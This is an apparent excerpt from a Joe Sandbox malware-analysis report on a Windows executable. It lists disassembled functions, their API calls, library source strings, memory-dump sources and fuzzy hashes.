                                                  • __s != nullptr, xrefs: 00D1D3AF
                                                  • string::append received nullptr, xrefs: 00D1D3AA
                                                  • %s:%d: assertion %s failed: %s, xrefs: 00D1D3BE
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: _strlen
                                                  • String ID: %s:%d: assertion %s failed: %s$..\..\buildtools\third_party\libc++\trunk\include\string$__s != nullptr$string::append received nullptr
                                                  • API String ID: 4218353326-424192179
                                                  • Opcode ID: d9000e6c1763fa949bd4b2a41e5c9112e7f1359e19ad71b7bb12fe6e21a008c1
                                                  • Instruction ID: 3d400ac96d12654e7d33db2505cfe672342ea32974c24af9fdeb39eabdc9bccf
                                                  • Opcode Fuzzy Hash: d9000e6c1763fa949bd4b2a41e5c9112e7f1359e19ad71b7bb12fe6e21a008c1
                                                  • Instruction Fuzzy Hash: 12F028233401143A8210719A6C06DFF7F5ECBC2B70B08403BF81597242DFB1A88692F3
                                                  Function 00D6E0A6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,70D8F8EB,?,?,00000000,00D8B909,000000FF,?,00D6E167,00000002,?,00D6E203,00D72C3F), ref: 00D6E0DB
                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D6E0ED
                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,00D8B909,000000FF,?,00D6E167,00000002,?,00D6E203,00D72C3F), ref: 00D6E10F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 91c203639d895f7f430f040bacc0dd91e8207bd598e8fad2eafd821569f43bbf
                                                  • Instruction ID: a6d7bfe083da057838cfebd781f02ce51e1ed8920fb8ba3d56bfd9f30820ed3a
                                                  • Opcode Fuzzy Hash: 91c203639d895f7f430f040bacc0dd91e8207bd598e8fad2eafd821569f43bbf
                                                  • Instruction Fuzzy Hash: AA01A73595071DEFDB119F44DC09BAE7BB8FB04721F040626F811E22D0DBB49800CBA0
                                                  Function 00D54790 Relevance: 7.8, APIs: 5, Instructions: 277COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,00000000,?,?,?,00D540B0,?,?), ref: 00D547B7
                                                  • TryAcquireSRWLockExclusive.KERNEL32(?,?), ref: 00D54A21
                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,00000000,?,?,?,00D540B0,?,?), ref: 00D54A6B
                                                  • TryAcquireSRWLockExclusive.KERNEL32(?,?), ref: 00D54A9D
                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D54AB6
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ExclusiveLock$Release$Acquire
                                                  • String ID:
                                                  • API String ID: 1021914862-0
                                                  • Opcode ID: 397663fda6e10c2164b2c82774760c2ec4d72cef7c4b0a900f0fa86cc4048260
                                                  • Instruction ID: 862850fb8b3566753d61dc0faef9f82adaca83ae746cc3e55b2ec22014c03ff7
                                                  • Opcode Fuzzy Hash: 397663fda6e10c2164b2c82774760c2ec4d72cef7c4b0a900f0fa86cc4048260
                                                  • Instruction Fuzzy Hash: 47B1DF70A003059BDF14DF64C881BEEB7B1FF48319F58442CEE55A7382DB75A9858BA1
                                                  Function 00D4B7B0 Relevance: 7.7, APIs: 5, Instructions: 217COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __floor_pentium4.LIBCMT ref: 00D4B942
                                                  • __floor_pentium4.LIBCMT ref: 00D4B9E1
                                                  • __floor_pentium4.LIBCMT ref: 00D4BA0F
                                                  • TryAcquireSRWLockExclusive.KERNEL32 ref: 00D4BA6B
                                                  • ReleaseSRWLockExclusive.KERNEL32 ref: 00D4BAA0
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: __floor_pentium4$ExclusiveLock$AcquireRelease
                                                  • String ID:
                                                  • API String ID: 2497314063-0
                                                  • Opcode ID: ed8a1a762a5ddba7423984440560dfb0711474652eff7ba18c5cd2661f63d5bd
                                                  • Instruction ID: 71e438ef690a64639539503fa215fa0069c6c98f35ba15105277bd51eb9e1347
                                                  • Opcode Fuzzy Hash: ed8a1a762a5ddba7423984440560dfb0711474652eff7ba18c5cd2661f63d5bd
                                                  • Instruction Fuzzy Hash: 25916F71A08B05CFC705DF38D45125AB7E5FF96390F058B2EF899A7261EB30D8858B92
                                                  Function 00D59290 Relevance: 7.6, APIs: 5, Instructions: 115memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InitOnceExecuteOnce.KERNEL32(00DD30A0,00D59270,00D593D0,00000000), ref: 00D592C7
                                                  • TlsGetValue.KERNEL32 ref: 00D592E8
                                                  • AcquireSRWLockExclusive.KERNEL32(00DD30AC), ref: 00D592FD
                                                  • ReleaseSRWLockExclusive.KERNEL32(00DD30AC), ref: 00D5932C
                                                  • TlsAlloc.KERNEL32 ref: 00D593D3
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ExclusiveLockOnce$AcquireAllocExecuteInitReleaseValue
                                                  • String ID:
                                                  • API String ID: 655554649-0
                                                  • Opcode ID: fb591fa575233677f19cbc14ccadd60a13046baa2f56505108a9266494eba7ce
                                                  • Instruction ID: c1cee41b2362d20a0925b638c7765c0e971d1227114e2c52fd2f8a9326d0e9c0
                                                  • Opcode Fuzzy Hash: fb591fa575233677f19cbc14ccadd60a13046baa2f56505108a9266494eba7ce
                                                  • Instruction Fuzzy Hash: FF316B75A01304DFDB109F64EC95A7EB7B4EB44711B48402EED06D33A0DB35A909CBB2
                                                  Function 00D6188D Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • EnterCriticalSection.KERNEL32(00DC3F80,FFFFFF00,?,00D04310,00DC4DB0,?,00D04493), ref: 00D61897
                                                  • LeaveCriticalSection.KERNEL32(00DC3F80,?,00D04310,00DC4DB0,?,00D04493), ref: 00D618CA
                                                  • WakeAllConditionVariable.KERNEL32(?,00DC4DB0,?,00D04493), ref: 00D6193D
                                                  • SetEvent.KERNEL32(?,00DC4DB0,?,00D04493), ref: 00D61947
                                                  • ResetEvent.KERNEL32(?,00DC4DB0,?,00D04493), ref: 00D61953
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                                                  • String ID:
                                                  • API String ID: 3916383385-0
                                                  • Opcode ID: 1970f93e2b6365be9056767d9685a02ef0936bacb953cb7a510b17f33f7274ac
                                                  • Instruction ID: 1ba888a3eff75657f812d596d076b90abb9e39e81bdb8f3a84a80af9f62e9d9f
                                                  • Opcode Fuzzy Hash: 1970f93e2b6365be9056767d9685a02ef0936bacb953cb7a510b17f33f7274ac
                                                  • Instruction Fuzzy Hash: 9C01E835905726DFC705AF18FC58E987B75EB0A721B05856EF502D3370C7B1A9018FA0
                                                  Function 00D474F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ___from_strstr_to_strchr_strncpy
                                                  • String ID: GCTL
                                                  • API String ID: 19282097-4108720618
                                                  • Opcode ID: ee7f20d1ef0822cbaa63e061c10de2d22511cebe3afdc61cd9f918cdf28d7671
                                                  • Instruction ID: b45c8b7c1e35226a431772d583563353296beb5c2eba11d55909f2125489cdac
                                                  • Opcode Fuzzy Hash: ee7f20d1ef0822cbaa63e061c10de2d22511cebe3afdc61cd9f918cdf28d7671
                                                  • Instruction Fuzzy Hash: 3F516E71D047599BCF14DFA8C884AEDB7B5EF44314F1A8629E849AB245E730ED44CBA0
                                                  Function 00D5A7F0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 141COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TryAcquireSRWLockExclusive.KERNEL32(00000000), ref: 00D5A81A
                                                    • Part of subcall function 00D273E0: AcquireSRWLockExclusive.KERNEL32(00000000,?,00D452D8), ref: 00D273E4
                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,?,00D5B690,00D5B8F0), ref: 00D5A9A5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ExclusiveLock$Acquire$Release
                                                  • String ID: ..\..\base\task\thread_pool\sequence.cc$Clear
                                                  • API String ID: 1678258262-2777391792
                                                  • Opcode ID: fad0ae4708d809abef247f039fee6bc07a747ba8ec8ebe54e4351940a5f2f868
                                                  • Instruction ID: 1c264ee1bf90d3fa22f4054d41b677f9b343f63d2f03c7fe0cb39508a09020aa
                                                  • Opcode Fuzzy Hash: fad0ae4708d809abef247f039fee6bc07a747ba8ec8ebe54e4351940a5f2f868
                                                  • Instruction Fuzzy Hash: 325159B0604716AFDB40DF28C484B5ABBE0BF88315F444A2DEC899B641D771E959CFA2
                                                  Function 00D79E7D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 125COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00D79D83,?,?,00000000,00000000,00000000,?), ref: 00D79EA2
                                                  • CatchIt.LIBVCRUNTIME ref: 00D79F88
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: CatchEncodePointer
                                                  • String ID: MOC$RCC
                                                  • API String ID: 1435073870-2084237596
                                                  • Opcode ID: cd99f26b8c584012417828b7cff78b6ab016fef2edab47a6865c578ccde2f09a
                                                  • Instruction ID: 3818ef51a229f4f25690e358529ed30c114d3bbcf85a850fd29093417d280c9b
                                                  • Opcode Fuzzy Hash: cd99f26b8c584012417828b7cff78b6ab016fef2edab47a6865c578ccde2f09a
                                                  • Instruction Fuzzy Hash: A8417A32900209AFDF15CF98CC91AEEFBB5FF48304F188069F909A7221E3359960DB60
                                                  Function 00D50330 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 114COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,00D3124F), ref: 00D503A3
                                                  • ReleaseSRWLockExclusive.KERNEL32(?,FFFFFFFF,?,?), ref: 00D50498
                                                  Strings
                                                  • ..\..\base\metrics\statistics_recorder.cc, xrefs: 00D50463
                                                  • FindAndRunHistogramCallbacks, xrefs: 00D50468
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ExclusiveLock$AcquireRelease
                                                  • String ID: ..\..\base\metrics\statistics_recorder.cc$FindAndRunHistogramCallbacks
                                                  • API String ID: 17069307-3431145642
                                                  • Opcode ID: f0a7635da72ee718d9c49ec0ad66ab41b61e3059a615c19eb98ce71722ac5e39
                                                  • Instruction ID: 999f27727b700c18cded1d6adefd88a0c2410ebda23366fe1fdd6ab2679ce1e9
                                                  • Opcode Fuzzy Hash: f0a7635da72ee718d9c49ec0ad66ab41b61e3059a615c19eb98ce71722ac5e39
                                                  • Instruction Fuzzy Hash: AB31C379A00340ABEB10EF14AC42F7E77A4EB89716F04442AFD4557392DB71AA0C8773
                                                  Function 00D26450 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 88registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,?,00000001,?,?,?,?,80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000001), ref: 00D264ED
                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000400,?,?,?,?,?,?,?,80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000001), ref: 00D26547
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: EnvironmentExpandQueryStringsValue
                                                  • String ID: ..\..\base\win\registry.cc$ReadValue
                                                  • API String ID: 1756134249-2708835790
                                                  • Opcode ID: ac9a0017cbadf4e2e5df19c10acabef30bba282fc96e666e2b3a01856407ffe1
                                                  • Instruction ID: fa3659fbf11cd41f238364631914720340f0b0128f5090372b26fd62f2bd598e
                                                  • Opcode Fuzzy Hash: ac9a0017cbadf4e2e5df19c10acabef30bba282fc96e666e2b3a01856407ffe1
                                                  • Instruction Fuzzy Hash: 84312672900258BBDB30DA24DC41FEE736CEF44314F0445A6F29AA7281DAB4DAC58FB0
                                                  Function 00D2B120 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 00D2B142
                                                  • GetProcAddress.KERNEL32(00000000,RtlGetDeviceFamilyInfoEnum), ref: 00D2B14E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: RtlGetDeviceFamilyInfoEnum$ntdll.dll
                                                  • API String ID: 1646373207-1730918567
                                                  • Opcode ID: 194eb2f97a9885ea7531ea89daa3ff22070d9743e9d2c98b9931552b12bd8f88
                                                  • Instruction ID: e3b9ccaa38e5d4d7687d927d73461db0f19dfb7d91116a26d82d4de25a350745
                                                  • Opcode Fuzzy Hash: 194eb2f97a9885ea7531ea89daa3ff22070d9743e9d2c98b9931552b12bd8f88
                                                  • Instruction Fuzzy Hash: AC21F031E04B28EFD701DFA4E814B6937A5EF0A339F0941A6E50A9B3A1D770DC109BB1
                                                  Function 00D290E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00D29187
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
